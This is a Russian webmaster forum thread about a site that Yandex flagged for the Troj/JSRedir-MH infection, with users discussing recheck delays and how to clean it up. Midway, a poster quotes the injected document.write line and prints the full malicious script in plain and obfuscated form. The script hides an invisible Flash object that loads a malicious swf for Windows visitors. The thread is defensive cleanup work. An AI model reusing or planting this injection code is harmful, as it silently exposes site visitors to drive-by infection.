dqdmitry

Рейтинг
0
Регистрация
16.10.2013
Яндекс нашел вирус на сайте

Уважаемое сообщество, подскажите пожалуйста еще такую вещь.

Что именно означает у Яндекса "перепроверка с такого-то по такое-то число не удалась"?

У меня так второй раз уже, сначала с 16.10.13 по 18.10.13 не удалась, теперь висит надпись в вебмастере, что уже с "16.10.13 по 20.10.13 не удалась. Очередная перепроверка займёт несколько дней."

Бот от Яндекса заходил и 17-го, и 19-го числа... Т.е. был на сайте.

Но дата последней проверки в вебмастере так и стоит 16.10.13😡

Письмо с просьбой перепроверить отправил еще 18-го, спустя двое суток получил Платоновский ответ, что мол, спасибо, пересмотрим в ближайшее время, и сообщим,... оставте свое мнение о нашем ответе...

Ничего не понимаю.

Яндекс нашел вирус на сайте
Rxp:
Это все вы удаляете последствия, но не причину, вам обязательно нужно проверить ваш рабочий код движка.

Как это сделать?

Яндекс нашел вирус на сайте
iklim:
Еще стоит обратить внимание на тот swf файл, путь к которому зашифрован в скрипте.
И собственно не забыть удалить этот swf файл.
На хабре писали как дешифрировать http://habrahabr.ru/post/196882/

Спасибо, swf файл удалил, нашёл просто поиском по шаблону всех файлов с таким расширением, их у нас не так и много, "левый" сразу видно.

sibirov:
Troj/JSRedir-MH данный вирус также создает несколько php файлов, у меня они находились в папке с вирусным js и в соседних папках.

То же самое. Кстати их у меня легко нашёл на скачанном бэкапе вебовский cureit. Они лежали в папках с картинками, и имена взяли с одной из картинок в этих папках, только с расширением php. Вот так обзывались: gradient2b.php и no_avatar17.php.

iklim:
Вирусописатели на славу постарались )

Руки бы им по отрывать😡

Яндекс нашел вирус на сайте
Medialt:
М.б. поможет кому:
вылечился недавно от Troj/JSRedir-MH (так со ссылкой на sophos его обозвал Яндекс)
сам скрипт лежал в administrator/templates/bluestork/main.js
ссыль на него дописалась последней строкой в components/com_virtuemart/assets/js/vmsite.js

Спасибо огромное, надеемся, что и нам поможет, яндекс пока не перепроверил, ждём...

Обозвал он его так-же: Troj/JSRedir-MH

Саму строку нашёл в конце файла одного из модов, выглядела вот так:

;document.write("<scr"+"ipt src='/adm/images/show_ads.js'><"+"/script>");

И собственно сам файл

function addNewObject(){try{var ua=navigator.userAgent.toLowerCase();if((ua.indexOf("chrome")==-1&&ua.indexOf("win")!=-1)&&navigator.javaEnabled()){var counter="/images/avatars/random/no_avatar17.swf";var div=document.createElement('div');div.innerHTML='<object id="dummy" name="dummy" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1">';div.innerHTML+='<param name="allowScriptAccess" value="always" \/>';div.innerHTML+='<param name="movie" value="'+counter+'" \/>';div.innerHTML+='<embed id="dummy2" name="dummy2" src="'+counter+'" width="1" height="1" name="flash" allowScriptAccess="always" type="application\/x-shockwave-flash" \/>';div.innerHTML+='<\/object>';div.style.position='absolute';div.style.left='-100px';div.style.top='-100px';document.body.insertBefore(div,document.body.children[0]);}}catch(e){if(document.body==undefined||document.body.children[0]==undefined){setTimeout('addNewObject()',50);}}};addNewObject();

В предыдущих бэкапах он видоизменялся, и имел, к примеру, вот такой вид, по моему такой-же, как и у вас:

function addNewObject () {
	try {
		var ua = navigator.userAgent.toLowerCase();
		if ((ua.indexOf("chrome") == -1 && ua.indexOf("win") != -1) && navigator.javaEnabled()) {
			var wzanL=["\x45nqd\x53\x71GmOS\x6e\x74\x61r17\x76\x76D\x70s\x51k\x43O\x73A\x76f\x4d\x6d","\x4aI\x72\x72\x54\x4c\x70\x7a\x76N\x42\x78Wz\x7aka","Gr\x75\x65y\x72x\x66T\x58y\x6eo\x5fa\x76D\x51\x61SJ\x49F\x54\x6a","su\x62\x73t\x72","Bih\x47HQeQx\x6eA\x6f\x74PVy\x44\x76\x71/i\x6dag\x65s\x2fa\x76\x61t\x61r\x73/\x72\x61\x6e\x4bDJf","eF\x6a\x65\x62\x5aw\x79\x58d\x67\x49\x57k\x59\x6bd\x6fm\x2fH\x79\x4f\x77r\x61\x54k\x47","Bhs\x41\x72lM\x4fvGN\x6d\x57\x56y\x68\x71\x78\x54\x66\x77f\x47\x64\x57WJ","\x43\x50fD\x4cx\x42\x63RtR\x47\x43\x2esx\x71nRhL\x43\x68pFOR"];var counter = wzanL[94-90][wzanL[3]](50-79+48,-69+91-3) + wzanL[-13+11+7][wzanL[3]](-58+54+14+6,76-71-1) + wzanL[-38-36-53+129][wzanL[3]](-11-15-72+109,-41-93+78+61) + wzanL[1][wzanL[3]](-21+42+39-44,-91-32+45+79) + wzanL[0][wzanL[3]](89-78,21-16) + wzanL[5+36-34][wzanL[3]](-80+93,-90+92) + wzanL[5+48+94-141][wzanL[3]](48-13-15,-24+26);
			var div = document.createElement('div');
			div.innerHTML  = '<object id="dummy" name="dummy" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1">';
			div.innerHTML += '<param name="allowScriptAccess" value="always" \/>';
			div.innerHTML += '<param name="movie" value="'+ counter +'" \/>';
			div.innerHTML += '<embed id="dummy2" name="dummy2" src="'+ counter +'" width="1" height="1" name="flash" allowScriptAccess="always" type="application\/x-shockwave-flash" \/>';
			div.innerHTML += '<\/object>';
			div.style.position = 'absolute';
			div.style.left = '-100px';
			div.style.top = '-100px';
			document.body.insertBefore(div, document.body.children[0]);
		}
	} catch (e) {
		if (document.body == undefined || document.body.children[0] == undefined) {
			setTimeout('addNewObject()', 50);
		}
	}
}
addNewObject();

Может быть подскажете на что ещё обратить внимание, чтобы досконально вычистить эту заразу?

Заранее спасибо!